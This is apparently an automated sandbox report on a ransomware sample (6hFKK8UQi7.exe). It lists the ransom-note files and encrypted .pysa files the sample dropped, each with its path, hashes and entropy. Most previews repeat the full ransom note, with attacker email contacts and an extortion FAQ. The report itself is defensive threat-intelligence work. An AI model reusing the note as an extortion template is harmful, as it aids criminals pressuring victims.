                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\C\Users\user\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Virtualized\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetCookies\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\INetHistory\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AC\Temp\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\AppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalCache\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1066
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:24:6/8w4ArlF0COjBJyPSyoYno8w4ArlF0COjBJyPSyoYnF:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLF
                  MD5:568DB4D05550FA45C36D5A6CE51B3C1E
                  SHA1:8BD03084D1422DBA44D3A33496497399305DF033
                  SHA-256:6186A0A5B859E4539987E870440C03FFDE12E2846E78AE22B614953326496B78
                  SHA-512:15F8D0418C868E84B550741E4F14277C8F171DEC2A7A7D06BC3DA0B969D9908E95C244AE939164F18C1374C74B566AA3DFC92733064B349422654A3688023EC6
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\RoamingState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\settings.dat.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):9216
                  Entropy (8bit):7.669577401684879
                  Encrypted:false
                  SSDEEP:192:+tPcYdruw6oD8v3qidqOdskkk3Oju9BJ+0K+hpmXxznvji2txXf1Yw:Qk8OoD8vNPdskRku9BJ+/+pmBLXx9Yw
                  MD5:7AC05043170143CB0D3CB41C8AFE036A
                  SHA1:BD185D75903682F01BD9373D89F1A570E9E50BC7
                  SHA-256:9E565588A811FDBA84BF6ECD3F5BBA6347EB3EF3F6715C313B8A3DD98B357DC4
                  SHA-512:71F6D99FEAEB4B029B4615EDB5FD92D73826BB1A6C1B1C02E4B9D67972633F2115B9E79CDDB9E572EF9CA292B3F44AC3FB2C837CDB3DD5464A437B3DB1679508
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\SystemAppData\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\TempState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):533
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:12:69gE8ZWB6WtM7AraoF0qoe2n2bL6UmnJr2oWwZZ10oYCULdBp:6/8w4ArlF0COjBJyPSyoYnF
                  MD5:1F55F883082DB96B80D92BC0D20C9104
                  SHA1:72550E6CF46E5CE356F193B3DFFA92DBB7AD3F2F
                  SHA-256:070CE4A7C47F0097F223A4D1FFCCB80E50E8974245E4C58759A832CDD9235AE0
                  SHA-512:020A87C3DD4A99D249832651C3D79AC3C5DB06713B20E27212B844B8E1EC7DAFCEC32E5F6E934A7986136880B2982041013072E457A3F8684F8E714BF5C7CB0A
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl.0001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):66560
                  Entropy (8bit):7.989807844868503
                  Encrypted:false
                  SSDEEP:1536:8m2gz+b4kkZft/yF40N66GeFY43KmV/v5kWG3BrknYNRmed:8Fc+b4kW66W39VH5LG3eYqed
                  MD5:B336C0E113AD980300BE22B3E638BC9E
                  SHA1:0FB3DD9BDE5DAD4B8117387F4753B61CD1B322F5
                  SHA-256:5050EB1D4B38DC0F7E46DE9A6981B6AC9099942DD232F2069C3D4ECB3751BE39
                  SHA-512:34218B9E810520AD922D05EC57C31ACCAC1708407581754B4D00F3C268E1E43FC98FFEBF6FE08834424AA47525B0A269E34510B613750E57E284B6F4D9141677
                  Malicious:false
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl.0001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.994547557894216
                  Encrypted:true
                  SSDEEP:3072:SjhaC3coiy7cnOHRSsAgCmayon6UFSzlEfD:00tnOGUayLUF9
                  MD5:CBC6551F2BEA52F138D7F2288390303B
                  SHA1:D258898827028A6DA991387D7652D7FFDEB86DE2
                  SHA-256:D0712B7EB9B77DC3F78C24E53BF261574A6338E4F5991463DD52E81E6C429762
                  SHA-512:0ACFD282C10555BD034B447EBB55E0A943F8383EC9F16044C4366AB2631B2E48AB10726FC4452638535B8F6F2F8447D12E5563802C5D0C0AC999A45B3F977A2E
                  Malicious:true
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl.0001.pysa
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):104448
                  Entropy (8bit):7.9946818573106775
                  Encrypted:true
                  SSDEEP:1536:mYz8uSMbjrcgaYSmPHkiBWG30ame+Fh2kanRt3ADwMNMqx+340N2YYuZ2OyPbcoa:/zmVK0r2Z5hq85NcY2pbcHtII
                  MD5:86BA7E3A653E5C9927E3D89160B98E1B
                  SHA1:B992FEA9B1E5185D66764862DB58CDD600291E88
                  SHA-256:077D8906F61D18D8EEFBEE0EA893DBEDDCDD114787D991C30CE0E933B67BBFAE
                  SHA-512:7D0F7207AE63BFB966ECAE0B9AD38E4848A920E6518BAACC8D734A359D005FA540325FEB3995AEAEDCCB0A3D8B0A11A5D962F1E98BC5EACE16EA00193C055C35
                  Malicious:true
                  C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):1599
                  Entropy (8bit):4.811606048365171
                  Encrypted:false
                  SSDEEP:48:6/8w4ArDPOjPCbLo8w4ArDPOjPCbLo8w4ArDPOjPCbLF:eNDPOmbLgNDPOmbLgNDPOmbLF
                  MD5:33BAEE98E6812F33006EC1904131C43E
                  SHA1:6B21E5528FF8A4B3B5F2D1AC2E3D1849C273B648
                  SHA-256:81E8B5A8328AA847298DEE38F3C49EB5331F19C1E585E692AC61E1EDA731801A
                  SHA-512:3749BAE2D1F62FDB0758F23C75D14B3521825606513DD03C9B3CC1741A3E9A75FE519B3EF61302FBCD172F4CA8E325716897DFBE6B8B15246821E3034955162D
                  Malicious:false
                  Preview: Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3... Q: What to tell my boss?.. A: Protect Your System Amigo.....Hi Company,....Every byte on any types of your devices was encrypted...Don't try to use backups because it were encrypted too.....To get all your data back contact us:..JessicaOster@protonmail.com..Brett_Nolan1993@protonmail.com..--------------....FAQ:....1... Q: How can I make sure you don't fooling me?.. A: You can send us 2 files(max 2mb).....2... Q: What to do to get all data back?.. A: Don't restart the computer, don't move files and write us.....3..
                  C:\Users\user\AppData\Local\Packages\ActiveSync\Readme.README
                  Process:C:\Users\user\Desktop\6hFKK8UQi7.exe
                  File Type:Unknown
                  Category:dropped
